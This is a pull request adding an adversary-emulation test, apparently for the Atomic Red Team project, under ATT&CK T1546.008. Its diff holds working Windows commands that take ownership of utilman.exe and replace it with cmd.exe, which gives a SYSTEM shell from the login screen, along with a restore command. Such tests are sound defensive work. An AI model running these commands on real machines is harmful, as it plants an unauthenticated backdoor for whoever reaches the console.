### PR TITLE
Update T1546.008.yaml - New Atomic Test

### DIFF
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -121,3 +121,18 @@ atomic_tests:
        reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
     name: command_prompt
     elevation_required: true
+- name: Replace utilman.exe (Ease of Access Binary) with cmd.exe
+  description: |
+    Replace utilman.exe (Ease of Access binary) with cmd.exe. This allows the user to launch an elevated command prompt by clicking the Ease of Access button on the login screen.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      IF NOT EXIST C:\Windows\System32\utilman_backup.exe (copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman_backup.exe) ELSE ( pushd )
+      takeown /F C:\Windows\System32\utilman.exe /A
+      icacls C:\Windows\System32\utilman.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\utilman_backup.exe C:\Windows\System32\utilman.exe
+    name: command_prompt
+    elevation_required: true


### PR DESCRIPTION
This is a proposal for a new atomic test for T1546.008. This test builds off of Atomic Test 2. 

**Details:**
In this test, utilman.exe is replaced with cmd.exe in order to launch an elevated command prompt by clicking the Ease of Access button on the login screen.

**Testing:**
Both the attack commands and cleanup command have been successfully tested in a Windows 11 VM.

**Associated Issues:**
No issues to report.